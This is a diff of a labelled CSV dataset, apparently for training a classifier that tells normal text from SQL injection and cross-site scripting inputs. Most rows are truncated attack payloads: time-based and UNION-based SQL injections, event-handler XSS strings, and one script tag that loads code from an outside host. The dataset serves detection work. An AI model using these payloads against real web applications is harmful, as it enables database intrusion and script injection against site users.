+1'+ ( select gkve where 1943 = 1943 waitfor delay ,2,SQLi,16470 +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>,1,XSS,1256 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) # ",2,SQLi,21153 +Insert the missing puzzle piece.,0,normal,22549 +"1, ( select ( case when ( 5726 = 5275 ) then 1 els",2,SQLi,16667 +Select your preferred search engine from the list ,0,normal,25564 +"1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9b",2,SQLi,11980 +"<style>@keyframes x{}</style><pre style=""animation",1,XSS,2124 +"<canvas draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2675 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,22180 +1 where 8921 = 8921 rlike ( select * from ( select,2,SQLi,13232 +"1 where 8273 = 8273 union all select null,null,nul",2,SQLi,18504 +"<style>@keyframes x{}</style><s style=""animation-n",1,XSS,6121 +Where's the sledding hill?,0,normal,23611 +<object onbeforescriptexecute=confirm(0)>,1,XSS,9711 +Sort the tangled wires.,0,normal,22667 +"<fieldset oncontextmenu=""alert(1)"">test</fieldset>",1,XSS,3614 +I need to select the ideal location for the event.,0,normal,23703 +"1"" ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,14448 +"1' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex (",2,SQLi,16737 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,16504 +<s onpointermove=alert(1)>XSS</s>,1,XSS,7069 <form><button formaction=javascript&colon;alert(1),1,XSS,338 -"-7676"" ) ) as flov where 7967 = 7967 union all sel",2,SQLi,20890 -"<sup draggable=""true"" ondrag=""alert(1)"">test</sup>",1,XSS,7891 -></select><script>alert(123)</script>,1,XSS,1332 -"UNION ALL SELECT 1,2,3,4,5#",2,SQLi,10537 -<tr onfocusout=alert(1) tabindex=1 id=x></tr><inpu,1,XSS,4005 -"1"" or 7552 = ( select count ( * ) from rdb$fields ",2,SQLi,22308 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10685 -"{""id"":null,""name"":""Plesiomon""}",0,normal,27528 -Where's the batting cage?,0,normal,23605 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8916 -Select the ideal gift for a special occasion.,0,normal,24173 -"<table onmouseleave=""alert(1)"">test</table>",1,XSS,7772 -<time onpointerover=alert(1)>XSS</time>,1,XSS,7018 -1' ) as yyyb where 1705 = 1705 and ( 8770 = 6988 ),2,SQLi,13140 -If you want to allow presenters to record your mee,0,normal,26042 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,18133 -"{""id"":null,""name"":""Steller’s Sea Cow""}",0,normal,27268 -"<image onkeypress=""alert(1)"" contenteditable>test<",1,XSS,7262 -1' ) as mmhe where 2142 = 2142 or 8466 = benchmark,2,SQLi,22147 -Select scheme.,0,normal,24746 -"Extra 220% – 220% off select items with code SALE,",0,normal,26201 -<kbd id=x tabindex=1 onfocus=alert(1)></kbd>,1,XSS,1842 +"-1059"" ) union all select 1276,1276,1276,1276,1276",2,SQLi,20888 +<aside id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,7893 +">""><script src = 'http://www.site.com/XSS.js'></sc",1,XSS,1333 +"UNION ALL SELECT 1,2,3,4,5,6,7#",2,SQLi,10539 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4007 +"{""id"":null,""firstName"":""Mohd"",""lastName"":""Amrul"",""",0,normal,27137 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10687 +"{""id"":null,""name"":""Plesiomon""}",0,normal,27528 +Select download.,0,normal,24594 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8918 +1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |,2,SQLi,15679 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7774 +"<content onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,7020 +1'|| ( select 'zpwe' from dual where 7743 = 7743 u,2,SQLi,13142 +"If you select ""2009"" in the list of years at the t",0,normal,26039 +"1',iif ( 9496 = 4153,1,1/0 )",2,SQLi,18131 +-9389' ) order by 1#,2,SQLi,16063 +<style>:target {color: red;}</style><head id=x sty,1,XSS,7264 +-7444 ) ) ) or 1342 = 9774,2,SQLi,22145 +1 ) as tgqd where 6369 = 6369 and 6055 = ctxsys.dr,2,SQLi,14732 +Select your industry.,0,normal,24859 +"<table onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,1843 "<xss onscrollend=alert(1) style=""display:block;ove",1,XSS,34 -1 ) ) ) and 6969 = ( select 6969 from pg_sleep ( 5,2,SQLi,21922 -"-8060"" ) where 5290 = 5290 or 5903 = ( 'qqpjq'|| (",2,SQLi,15427 -&#x03c;,1,XSS,1077 -"<isindex onclick=""alert(1)"">test</isindex>",1,XSS,8504 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,12623 -"UNION ALL SELECT 1,2,3,4,5,6,7",2,SQLi,10509 --9122 ) as sdlg where 1546 = 1546 union all select,2,SQLi,13428 -<blockquote onpointerout=alert(1)>XSS</blockquote>,1,XSS,5400 -<basefont onpointerup=alert(1)>XSS</basefont>,1,XSS,1885 -1'|| ( select 'ymwf' where 1229 = 1229 or char ( 6,2,SQLi,14324 -lag,0,normal,23230 -( select ( case when ( 9856 = 9856 ) then sleep ( ,2,SQLi,12845 -<ul id=x tabindex=1 onfocusin=alert(1)></ul>,1,XSS,8432 -"<ruby draggable=""true"" ondrag=""alert(1)"">test</rub",1,XSS,5159 -"<kbd onkeydown=""alert(1)"" contenteditable>test</kb",1,XSS,8272 -1' and ( 5116 = 1602 ) *1602,2,SQLi,20947 -"( select like ( 'abcdefg',upper ( hex ( randomblob",2,SQLi,15169 -select pg_sleep ( 5 ) and ( ( ( 'xobx' = 'xobx,2,SQLi,12751 -Where's the tennis court?,0,normal,23602 -"<li onkeydown=""alert(1)"" contenteditable>test</li>",1,XSS,5887 --2223' ) ) as mjwp where 8650 = 8650 or 7900 = 583,2,SQLi,21571 -"<thead onmouseout=""alert(1)"">test</thead>",1,XSS,5271 -<datalist id=x tabindex=1 onfocusin=alert(1)></dat,1,XSS,1746 -"1"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ",2,SQLi,20727 -1 and 7533 = 7533,2,SQLi,19144 -Select purchase.,0,normal,24557 -<big id=x tabindex=1 ondeactivate=alert(1)></big><,1,XSS,5281 -"1"" ) where 7228 = 7228",2,SQLi,18998 -1 ) ) as rsnb where 3168 = 3168 procedure analyse ,2,SQLi,16773 -1' in boolean mode ) and 9254 = ( select count ( *,2,SQLi,17426 -"&lt;XML ID=\""xss\""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SR",1,XSS,1025 -"<dt oncut=""alert(1)"" contenteditable>test</dt>",1,XSS,4719 -"-8600"" or elt ( 1032 = 1032,3623 ) and ""kfsn"" like",2,SQLi,18206 -"-1204' ) ) union all select 3585,3585--",2,SQLi,22232 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11099 -"<nextid ondblclick=""alert(1)"">test</nextid>",1,XSS,3258 -<ins onpointerleave=alert(1)>XSS</ins>,1,XSS,8633 -"<output oncopy=""alert(1)"" contenteditable>test</ou",1,XSS,3325 -"-7869%' union all select 2406,2406,2406,2406,2406,",2,SQLi,21333 -1 ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||c,2,SQLi,16511 -1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2,2,SQLi,14688 -<strike id=x tabindex=1 onfocus=alert(1)></strike>,1,XSS,3744 -<caption onpointermove=alert(1)>XSS</caption>,1,XSS,7472 -"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,15081 -1' where 9961 = 9961 and 8514 = ( select count ( *,2,SQLi,16268 -"Instead of having hand controllers, users select i",0,normal,25983 --6890' ) ) or 5771 = 7721--,2,SQLi,14273 -1' where 3362 = 3362,2,SQLi,15869 -"-8791"" ) ) ) or make_set ( 6681 = 6620,6620 ) and ",2,SQLi,12396 -Select send.,0,normal,24699 --6233' ) where 9820 = 9820 or 3038 = 3038,2,SQLi,12366 -"-2898"" where 3301 = 3301 union all select 3301,330",2,SQLi,22427 -1' where 1628 = 1628,2,SQLi,18338 -"<bgsound draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,6814 -1 ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ),2,SQLi,14305 -"1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( ",2,SQLi,15984 -<iframe id=x onfocus=alert(1)>,1,XSS,6822 -"-2784' ) ) union all select 6775,6775,6775,6775,67",2,SQLi,22020 -<option id=x tabindex=1 onfocusin=alert(1)></optio,1,XSS,7441 -"-5606 ) union all select 7118,7118,7118,7118,7118,",2,SQLi,19295 --5449' or 4493 = utl_inaddr.get_host_address ( chr,2,SQLi,13368 -%' RLIKE SLEEP(5) AND '1337%'='1337,2,SQLi,11232 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,20247 -1' rlike sleep ( 5 ) and 'ojqz' like 'ojqz,2,SQLi,22353 -Select your stumble.,0,normal,25019 -"1"" ) where 1700 = 1700 union all select null,null,",2,SQLi,19459 -<applet onpointerenter=alert(1)>XSS</applet>,1,XSS,2358 -<style>:target {color: red;}</style><ul id=x style,1,XSS,4665 -"1"" ) order by 1#",2,SQLi,22178 -1%' ) ) or 1022 = ( select count ( * ) from all_us,2,SQLi,19210 -1' in boolean mode ) or 1022 = ( select count ( * ,2,SQLi,19929 -"1%' ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,12320 -"SRC=""http://www.thesiteyouareon.com/somecommand.ph",1,XSS,8377 -"1%"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 ",2,SQLi,12410 -Create map.,0,normal,23087 -"<bdi oncut=""alert(1)"" contenteditable>test</bdi>",1,XSS,5708 -"-5245"" ) ) ) union all select 8106,8106,8106#",2,SQLi,18430 -"window['a'+'l'+'e'+'r'+'t'].call(this,1)",1,XSS,9391 -<element id=x tabindex=1 ondeactivate=alert(1)></e,1,XSS,7177 -"-4826 union all select 4532,4532,4532,4532,4532--",2,SQLi,19274 -"{""id"":null,""name"":""Porygon""}",0,normal,26760 -<input onpointerup=alert(1)>XSS</input>,1,XSS,2125 -"-9160' ) union all select 8148,8148,8148,8148,8148",2,SQLi,16871 -"<frameset onkeypress=""alert(1)"" contenteditable>te",1,XSS,5660 -"or a""=""a",2,SQLi,10010 -"<abbr onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,3977 +1 ) where 5333 = 5333 or 9643 = ( select count ( *,2,SQLi,21920 +"1"" procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,15419 +&#x003c;,1,XSS,1078 +"<param draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8506 +"1 ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( (",2,SQLi,12625 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9",2,SQLi,10511 +"1"" ) and ( select 9067 from ( select count ( * ) ,",2,SQLi,13430 +<figure id=x tabindex=1 onfocus=alert(1)></figure>,1,XSS,5402 +"<form ondblclick=""alert(1)"">test</form>",1,XSS,1886 +1' ) and 7290 = 8416 and ( 'ktlz' like 'ktlz,2,SQLi,14317 +"1"" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||",2,SQLi,21903 +"1%"" ) ) ) or 4915 = ( select count ( * ) from doma",2,SQLi,12847 +"<style>@keyframes x{}</style><marquee style=""anima",1,XSS,8434 +<cite id=x tabindex=1 onfocusin=alert(1)></cite>,1,XSS,5161 +<details id=x tabindex=1 onactivate=alert(1)></det,1,XSS,8274 +1%' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ,2,SQLi,16861 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14268 +"elt ( 5953 = 5953,1 )",2,SQLi,12753 +Where's the gym?,0,normal,23599 +<ol id=x tabindex=1 onfocus=alert(1)></ol>,1,XSS,5889 +"Escape to the tranquility of the spa, indulge in s",0,normal,26213 +"<input draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,5273 +<input type=image src=1 onerror=alert(1)>,1,XSS,1747 +"1 ) ) and elt ( 4249 = 4249,7259 ) and ( ( 5683 = ",2,SQLi,20725 +"1 ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,19142 +Select item.,0,normal,24554 +"<svg draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,5283 +1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'clcf' = ,2,SQLi,18996 +"-4679 where 9634 = 9634 union all select 9634,9634",2,SQLi,21552 +Select return.,0,normal,24637 +"&lt;SPAN DATASRC=\""#xss\"" DATAFLD=\""B\"" DATAFORMAT",1,XSS,1026 +"<rp oncopy=""alert(1)"" contenteditable>test</rp>",1,XSS,4721 +"1"" ) ) ) and 7135 = 8805#",2,SQLi,18204 +1'+ ( select nsri where 1202 = 1202 and 4595 = 459,2,SQLi,22230 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11101 +"<keygen onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,3260 +"<plaintext onkeyup=""alert(1)"" contenteditable>test",1,XSS,8635 +<dfn id=x tabindex=1 onactivate=alert(1)></dfn>,1,XSS,3327 +-5708 where 3134 = 3134 or 5903 = ( 'qqpjq'|| ( se,2,SQLi,21331 +if ( 2695 = 9045 ) select 2695 else drop function ,2,SQLi,16509 +Select inspire.,0,normal,24732 +<audio onpointerleave=alert(1)>XSS</audio>,1,XSS,3746 +"<element onbeforepaste=""alert(1)"" contenteditable>",1,XSS,7474 +Go to the Start menu to Settings and select System,0,normal,26138 +1'|| ( select 'agng' from dual where 3337 = 3337 r,2,SQLi,16260 +"Instead, look to select U.S. companies with signif",0,normal,25980 +"-2701"" ) ) as wvht where 5401 = 5401 union all sel",2,SQLi,14266 +"When you select it, you will be given the opportun",0,normal,25144 +-4082 ) ) or 5903 = ( 'qqpjq'|| ( select case 5903,2,SQLi,12398 +Select unpack.,0,normal,24696 +"-8209 ) or 1 group by concat ( 0x7171706a71, ( sel",2,SQLi,12368 +"He had already attained some repute as a critic, w",0,normal,26119 +end and ( 9416 = 9416,2,SQLi,15343 +<aside onpointerdown=alert(1)>XSS</aside>,1,XSS,6816 +select current_setting('virtual_host');,2,SQLi,22509 +1 ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ,2,SQLi,15976 +"<svg onmousemove=""alert(1)"">test</svg>",1,XSS,6824 +The House Permanent Select Committee on Intelligen,0,normal,25430 +"<body draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,7443 +"-3782%"" ) or make_set ( 9354 = 9354,7185 ) and ( """,2,SQLi,19293 +"-7795"" ) where 1712 = 1712 union all select 1712,1",2,SQLi,13370 +") RLIKE SLEEP(5) AND (1337""=""1337",2,SQLi,11234 +1' ) ) or sleep ( 5 ) and ( ( 'taaj' = 'taaj,2,SQLi,15646 +"-4373%"" ) ) or 5672 = 5188--",2,SQLi,22351 +Select your lose.,0,normal,25016 +1%' ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ,2,SQLi,19457 +"<marquee onpaste=""alert(1)"" contenteditable>test</",1,XSS,2359 +"<style>@keyframes x{}</style><noframes style=""anim",1,XSS,4667 +Where's the dentist's office?,0,normal,23626 +Where's the snowboard park?,0,normal,23610 +select ( case when ( 1354 = 7529 ) then 1354 else ,2,SQLi,19927 +-3598 ) union all select 2264#,2,SQLi,12322 +"<wbr oncopy=""alert(1)"" contenteditable>test</wbr>",1,XSS,8379 +"-3361 ) ) union all select 2827,2827,2827,2827#",2,SQLi,12412 +Delete page.,0,normal,23084 +"<option onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,5710 +Sort the beads.,0,normal,22819 +"x=alert,x(1)",1,XSS,9393 +"<textarea draggable=""true"" ondragleave=""alert(1)"">",1,XSS,7179 +"1 ) where 5261 = 5261 and elt ( 1210 = 1210,sleep ",2,SQLi,18801 +Let's decide where to go for our adventure.,0,normal,23800 +<meta id=x tabindex=1 ondeactivate=alert(1)></meta,1,XSS,2126 +"You can also hold ""Command"" + ""A"" to select all. 4",0,normal,25103 +<head onfocusout=alert(1) tabindex=1 id=x></head><,1,XSS,5662 +") or ('a'='a and hi"") or (""a""=""a",2,SQLi,10012 +"<figcaption onmouseout=""alert(1)"">test</figcaption",1,XSS,3979 "<IMG SRC=""javascript:javascript:alert(1);"">",1,XSS,733 -anything' OR 'x'='x,2,SQLi,10170 -<code id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,5197 -Where clause in SQL query.,0,normal,23454 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3764 +1)) or sleep(__TIME__)#,2,SQLi,10172 +"<del onkeypress=""alert(1)"" contenteditable>test</d",1,XSS,5199 +Identify issues where present.,0,normal,23451 +<frameset onpointerenter=alert(1)>XSS</frameset>,1,XSS,3766 "<xss onmouseover=""alert(1)"" style=display:block>te",1,XSS,80 -<ruby onpointerup=alert(1)>XSS</ruby>,1,XSS,4562 -<image onpointerenter=alert(1)>XSS</image>,1,XSS,2332 -<style>:target {color: red;}</style><q id=x style=,1,XSS,4507 -""" and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11026 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4564 +"<ol onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,2333 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4509 +") and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11028 <style>//*{x:expression(alert(/xss/))}//<style></s,1,XSS,334 -"1%' union all select null,null,null#",2,SQLi,12684 -1'|| ( select 'etvo' from dual where 1557 = 1557,2,SQLi,13373 -1 ) where 1880 = 1880 and 8312 = dbms_pipe.receive,2,SQLi,20534 -"1"" ) as piwi where 2918 = 2918",2,SQLi,20137 -"{""id"":null,""firstName"":""Star Buy"",""lastName"":""Prop",0,normal,26766 -"{""id"":null,""name"":""Meganium""}",0,normal,26751 -Modify data where needed.,0,normal,23252 -<audio src onloadstart=alert(1)>,1,XSS,9076 -"<blockquote onmouseenter=""alert(1)"">test</blockquo",1,XSS,5151 -"-5496 union all select 2099,2099,2099#",2,SQLi,19706 -"1' ) and ( select 9067 from ( select count ( * ) ,",2,SQLi,18437 -"Simply select the layer you wish to paint onto, ma",0,normal,25546 -"<strike draggable=""true"" ondrag=""alert(1)"">test</s",1,XSS,6835 -<form onpointerout=alert(1)>XSS</form>,1,XSS,2373 -Containing select cases adjudged in the King's ben,0,normal,26267 -<custom tags onpointerout=alert(1)>XSS</custom tag,1,XSS,6178 -<plaintext onpointerleave=alert(1)>XSS</plaintext>,1,XSS,6248 -Its 2015 Berry Select Riesling was given a score o,0,normal,25945 -<data onblur=alert(1) tabindex=1 id=x></data><inpu,1,XSS,4254 -"<h1 oncut=""alert(1)"" contenteditable>test</h1>",1,XSS,4290 --1219' ) or 5592 = 4835,2,SQLi,12632 -"1%"" ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a",2,SQLi,13771 --1021 ) as erjh where 7845 = 7845 or 4747 = dbms_u,2,SQLi,16306 -"<kbd onmousemove=""alert(1)"">test</kbd>",1,XSS,5401 +1'|| ( select 'omeg' from dual where 4751 = 4751,2,SQLi,12686 +"1%"" and ( select * from ( select ( sleep ( 5 ) ) )",2,SQLi,13375 +"1' ) ) and elt ( 6847 = 5874,5874 ) and ( ( 'yspu'",2,SQLi,14908 +1' ) ) as sojl where 8710 = 8710 or char ( 119 ) |,2,SQLi,17391 +Select your preferred song.,0,normal,24446 +"{""id"":null,""firstName"":""Jermaine"",""lastName"":""Tan""",0,normal,26748 +She'll select the dessert.,0,normal,24448 +<body onfocus=alert(1)>,1,XSS,9078 +<meta onpointerdown=alert(1)>XSS</meta>,1,XSS,5153 +"1' and ( select 9067 from ( select count ( * ) ,co",2,SQLi,19072 +"-4615' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( (",2,SQLi,21904 +"Smart, Smart Plus and Select are the three class o",0,normal,25543 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6837 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2374 +1 ) as mtnw where 7293 = 7293 and 2603 = 5764--,2,SQLi,21414 +<svg><set onend=alert(1) attributename=x dur=1s>,1,XSS,6180 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6250 +"-6520%"" ) order by 1#",2,SQLi,18317 +"<u onmouseout=""alert(1)"">test</u>",1,XSS,4256 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4292 +"1' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ",2,SQLi,12634 +"select sleep ( 5 ) and ( ""innk"" = ""innk",2,SQLi,13773 +Select the perfect outfit for a gathering.,0,normal,24031 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5403 <script>Object.prototype.innerHTML = '<img/src/one,1,XSS,215 -1%' ) ) ) and 6537 = dbms_pipe.receive_message ( c,2,SQLi,20037 -She's researching where to buy the best produce.,0,normal,23842 -"<head oncontextmenu=""alert(1)"">test</head>",1,XSS,4802 -"-6453"" ) ) as hehs where 9363 = 9363 union all sel",2,SQLi,17826 -1 ) or 5286 = ( select count ( * ) from all_users ,2,SQLi,12576 -"He was a select preacher at Oxford in 1895-1897, a",0,normal,26111 -"<caption onbeforepaste=""alert(1)"" contenteditable>",1,XSS,3155 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10770 -1'+ ( select gqez where 3704 = 3704,2,SQLi,13242 +1'|| ( select 'jzwq' where 3289 = 3289 union all s,2,SQLi,20035 +I need to select the right song for the event.,0,normal,23839 +<element id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,4804 +"select pg_sleep ( 5 ) and ""ilyw"" like ""ilyw",2,SQLi,17824 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,12578 +"{""id"":null,""name"":""Togekiss""}",0,normal,27414 +"<source onmouseenter=""alert(1)"">test</source>",1,XSS,3157 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10772 +"-1558 or elt ( 3306 = 2272,2272 ) -- ioxt",2,SQLi,13244 <body ontouchstart=alert(1)>,1,XSS,107 -Select disapprove.,0,normal,24574 -"waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,19345 -"<head draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,3405 -1' ) ) or 7417 = ( select count ( * ) from sysibm.,2,SQLi,13832 -"<footer onmouseover=""alert(1)"">test</footer>",1,XSS,7717 -"-5420' ) union all select 2508,2508,2508,2508,2508",2,SQLi,19894 -1 ) as iupg where 2861 = 2861 or 4411 = ( select c,2,SQLi,13349 -"GM, for example, restricts Super Cruise's usage to",0,normal,26141 -"-6389"" union all select 2355,2355,2355,2355,2355--",2,SQLi,13963 -"<rb onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,6526 -"1"" and 4386 = utl_inaddr.get_host_address ( chr ( ",2,SQLi,20647 -<rtc onpointerup=alert(1)>XSS</rtc>,1,XSS,6388 -"{""id"":null,""name"":""affect""}",0,normal,27283 -"While some costs may be standard across the board,",0,normal,25130 -1' rlike sleep ( 5 ),2,SQLi,20067 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2977 -"<img src=""mocha:document.vulnerable=true;"">",1,XSS,1529 -"{""id"":null,""firstName"":""Kp"",""lastName"":""Lee"",""spec",0,normal,26787 +"1"" ) ) and sleep ( 5 ) #",2,SQLi,20635 +1%' ) and sleep ( 5 ) and ( '%' = ',2,SQLi,19343 +<isindex onpointerdown=alert(1)>XSS</isindex>,1,XSS,3407 +"-6803"" ) order by 1#",2,SQLi,13834 +"<s draggable=""true"" ondragstart=""alert(1)"">test</s",1,XSS,7719 +"-7551 or elt ( 6900 = 7195,7195 )",2,SQLi,18070 +"1%"" ) and 5556 = ( select count ( * ) from all_use",2,SQLi,13351 +1' ) ) as fjbe where 4662 = 4662 or 2367 = ( selec,2,SQLi,17864 +"-4811%' ) ) or 1570 = convert ( int, ( select char",2,SQLi,13956 +<strike onpointermove=alert(1)>XSS</strike>,1,XSS,6528 +I need to pick up my order from the store.,0,normal,23735 +<source id=x tabindex=1 ondeactivate=alert(1)></so,1,XSS,6390 +"-9078 union all select 3779,3779,3779,3779,3779,37",2,SQLi,19255 +Insert drive.,0,normal,23030 +Expansion of early and late antlerless seasons in ,0,normal,26205 +"<s onbeforecut=""alert(1)"" contenteditable>test</s>",1,XSS,2978 +"<img src=""livescript:document.vulnerable=true;"">",1,XSS,1530 +"{""id"":null,""firstName"":""Nguan Eng"",""lastName"":""Tan",0,normal,26784 "<! foo=""[[[Inception]]""><x foo=""]foo><script>alert",1,XSS,966 -"{""id"":null,""firstName"":""Zoey"",""lastName"":""Tam"",""ad",0,normal,26912 -<style>:target {color: red;}</style><map id=x styl,1,XSS,2925 -<marquee loop=1 width=0 onfinish=alert(1)>//INJECT,1,XSS,9855 +1 ) as xtgr where 1545 = 1545,2,SQLi,20538 +<header onpointerdown=alert(1)>XSS</header>,1,XSS,2926 +"#goto,javascript:alert(1)"",",1,XSS,9857 `><\x3Cimg src=xxx:x onerror=javascript:alert(1)>,1,XSS,456 -"{""id"":null,""firstName"":""Damien"",""lastName"":""Gareth",0,normal,27332 -<summary onpointerout=alert(1)>XSS</summary>,1,XSS,7054 -"or benchmark(50000000,MD5(1))--",2,SQLi,10389 -"1"" ) ) as jsdc where 2748 = 2748",2,SQLi,20704 -Select your profession.,0,normal,24857 -1 where 1931 = 1931 and sleep ( 5 ) --,2,SQLi,18120 --9264' ) or 8571 = 8571--,2,SQLi,14187 -<script>alert(‘XSS’)</script>,1,XSS,9287 -1' where 3125 = 3125 ( select ( case when ( 5451 =,2,SQLi,16637 -"admin"" ) or ""1"" = ""1""/*",2,SQLi,12021 -"1"" ) ) as vgsb where 4747 = 4747",2,SQLi,21386 -1' where 2202 = 2202 and 2716 = ( select count ( *,2,SQLi,20027 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,21421 -"-1277"" ) where 6622 = 6622 or 3038 = 3038",2,SQLi,13020 --8069 ) ) as sxbn where 7689 = 7689 union all sele,2,SQLi,18867 -Melody tones This allows you to select from a rang,0,normal,25881 -Select sign.,0,normal,24632 -"1"" ) and ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,17293 -"{""id"":null,""firstName"":""Li Sin"",""lastName"":""Tan"",""",0,normal,27320 -1' in boolean mode ) or 7552 = ( select count ( * ,2,SQLi,17809 -It is evident that accurate knowledge of the chara,0,normal,25968 -"1 and row ( 6237,7469 ) > ( select count ( * ) ,co",2,SQLi,16061 -"1, ( case when 6620 = 3092 then 1 else null end )",2,SQLi,15393 -"1"" ) ) as fmul where 7827 = 7827",2,SQLi,21616 -Filter the junk emails.,0,normal,22755 -"<var oncontextmenu=""alert(1)"">test</var>",1,XSS,3647 +select ( case when ( 7997 = 1543 ) then 7997 else ,2,SQLi,14237 +<svg><details onload=alert(1)></details>,1,XSS,7056 +pg_SLEEP(5),2,SQLi,10391 +"1' and 4241 = convert ( int, ( select char ( 113 )",2,SQLi,20702 +Select your title.,0,normal,24854 +"1%"" or 2633 = dbms_pipe.receive_message ( chr ( 11",2,SQLi,18118 +select ( case when ( 5009 = 1133 ) then 5009 else ,2,SQLi,14180 +<script>alert(“XSS”)</script>,1,XSS,9289 +"1"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""hvic"" l",2,SQLi,16635 +"select * from users where id = 1 or 1#""$ union sel",2,SQLi,12023 +"1"" where 2394 = 2394 and 8831 = 8333--",2,SQLi,21384 +Sort results where needed.,0,normal,23276 +"1"" ) as esks where 1138 = 1138",2,SQLi,13984 +"-1171' union all select 3958,3958,3958,3958,3958--",2,SQLi,13022 +"{""id"":null,""firstName"":""Fabian"",""lastName"":""Lau"",""",0,normal,27335 +Merely taking a median at each pixel will preferen,0,normal,25878 +Select shut.,0,normal,24629 +"1"" ) as hsws where 6656 = 6656",2,SQLi,17547 +"{""id"":null,""firstName"":""Wong"",""lastName"":""Qun Jie""",0,normal,27319 +"iif ( 8214 = 4954,1,1/0 )",2,SQLi,14104 +It is important you select the right one for your ,0,normal,25965 +1 ) as adzj where 5575 = 5575 or 8421 = ( select c,2,SQLi,16310 +1'+ ( select pxsd where 2576 = 2576 or updatexml (,2,SQLi,15385 +1'+ ( select 'sacd' where 5984 = 5984 union all se,2,SQLi,21614 +Insert the new SIM card.,0,normal,22752 +<nav onpointerover=alert(1)>XSS</nav>,1,XSS,3649 "<a href=""\x0Ejavascript:javascript:alert(1)"" id=""f",1,XSS,501 -Select last.,0,normal,24486 -1%' or 2633 = dbms_pipe.receive_message ( chr ( 11,2,SQLi,12212 +Select quickly.,0,normal,24483 +1'|| ( select 'tfqg' from dual where 9862 = 9862 a,2,SQLi,12214 "<input type=""hidden"" accesskey=""X"" onclick=""alert(",1,XSS,174 -"1"" ) ) rlike ( select ( case when ( 8179 = 1246 ) ",2,SQLi,20020 -<main id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,2099 -<style>:target {color:red;}</style><tt id=x style=,1,XSS,8528 --3688'|| ( select 'pber' from dual where 7137 = 71,2,SQLi,13344 -<textarea oncut=alert(1) autofocus>XSS</textarea>,1,XSS,8512 -1 ) ) as wrhe where 6120 = 6120 and 6240 = ( 'qqpj,2,SQLi,16031 -"1%' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745",2,SQLi,16307 -<img src=&{document.vulnerable=true;};>,1,XSS,1527 -<noframes onblur=alert(1) tabindex=1 